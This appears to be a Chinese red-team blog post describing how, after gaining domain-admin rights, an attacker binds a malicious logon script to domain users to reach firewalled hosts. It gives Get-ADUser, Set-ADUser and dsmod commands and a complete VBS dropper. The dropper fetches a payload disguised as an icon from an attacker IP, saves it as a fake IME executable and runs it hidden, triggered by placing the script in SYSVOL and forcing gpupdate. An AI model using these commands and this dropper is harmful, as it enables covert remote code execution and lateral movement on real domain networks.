0x1、利用场景
当获取到域控权限或domain admin等高权限时,想横向到域内PC主机上对方开启了防火墙,无法通过445、135进行横向利用,可以通过登录脚本绑定的方式获取目标主机权限。
0x2、利用方法
方法一、powershell win2012及以上自带,获取当前域用户信息
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
绑定指定用户
Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"
解绑
Set-ADUser -Identity zhangsan -ScriptPath " "
方法二、利用dsmod进行绑定
dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"
解绑
dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"
刷新组策略
shell gpupdate /force
VBS内容
strFileURL = "http://192.168.172.129:82/logo.ico"
strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
strComputer = "."
set ws=wscript.createobject("wscript.shell")
val=ws.run ("C:\Users\Public\Documents\ChsIME.exe",0)
上传至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目录下,通过方法一或方法二进行绑定后刷新组策略即可
参考文章
https://rcoil.me/2018/11/%E3%80%90%E5%9F%9F%E6%B8%97%E9%80%8F%E3%80%91%E5%9C%A8%E5%9F%9F%E6%8E%A7%E4%B8%8A%E4%BD%BF%E7%94%A8cmd%E6%9B%B4%E6%94%B9%E5%9F%9F%E7%94%A8%E6%88%B7%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84%E7%99%BB%E5%BD%95%E8%84%9A%E6%9C%AC/
标签:objXMLHTTP,9F%,Set,登录,渗透,objADOStream,E6%,E7%,下发 From: https://www.cnblogs.com/websecyw/p/16657762.html